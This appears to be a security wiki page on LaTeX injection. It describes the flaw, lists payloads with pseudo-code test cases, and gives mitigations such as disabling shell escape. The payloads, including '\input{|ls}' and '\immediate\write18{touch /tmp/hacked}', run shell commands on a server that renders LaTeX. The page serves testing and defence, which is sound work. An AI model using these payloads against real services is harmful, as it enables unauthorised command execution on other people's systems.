LaTeX Injection

Description

LaTeX Injection occurs when an application accepts and processes LaTeX code from user input without proper validation, allowing attackers to inject and execute arbitrary LaTeX commands.

Example with Scenario

Scenario: A web application generates PDF documents based on user input using a LaTeX engine. An attacker can inject malicious LaTeX commands to manipulate the document or execute arbitrary code.

Payloads and Test Cases

Payloads

Executing Arbitrary LaTeX Commands:
```
\input{|ls}
```

Modifying Document Structure:

\begin{document}
\section{Injected Section}
\end{document}

Running Shell Commands:
```
\immediate\write18{touch /tmp/hacked}
```

Test Cases

Executing Arbitrary LaTeX Commands:

Payload:
```
\input{|ls}
```

Test Case:

% Send payload to the server
sendPayloadToServer("\\input{|ls}");
% Verify if the application executes the ls command
checkServerResponseForDirectoryListing();

Modifying Document Structure:

Payload:

\begin{document}
\section{Injected Section}
\end{document}

Test Case:

% Send payload to the server
sendPayloadToServer("\\begin{document}\\section{Injected Section}\\end{document}");
% Verify if the application renders the injected section
checkPDFForInjectedSection("Injected Section");

Running Shell Commands:

Payload:
```
\immediate\write18{touch /tmp/hacked}
```

Test Case:

% Send payload to the server
sendPayloadToServer("\\immediate\\write18{touch /tmp/hacked}");
% Verify if the application runs the shell command
checkServerForFile("/tmp/hacked");

Mitigation

Input Validation:
- Validate and sanitize user input to ensure it does not contain malicious LaTeX commands.
- Use allow-lists to restrict input to safe LaTeX commands.
Disable Shell Escape:
- Configure the LaTeX engine to disable shell escape (e.g., --no-shell-escape).
- Prevent the execution of external commands from within LaTeX.
Use a Secure LaTeX Processor:
- Use secure LaTeX processing tools that provide protection against injection attacks.
- Enable built-in security features to sanitize LaTeX input.
Content Security Policy (CSP):
- Implement a strict Content Security Policy to limit the sources from which content can be loaded.
- Use CSP to prevent the execution of inline scripts and styles.

PreviousCRLF Injection NextCORS Misconfiguration

Last updated 10 months ago

% Send payload to the server sendPayloadToServer("\\begin{document}\\section{Injected Section}\\end{document}"); % Verify if the application renders the injected section checkPDFForInjectedSection("Injected Section");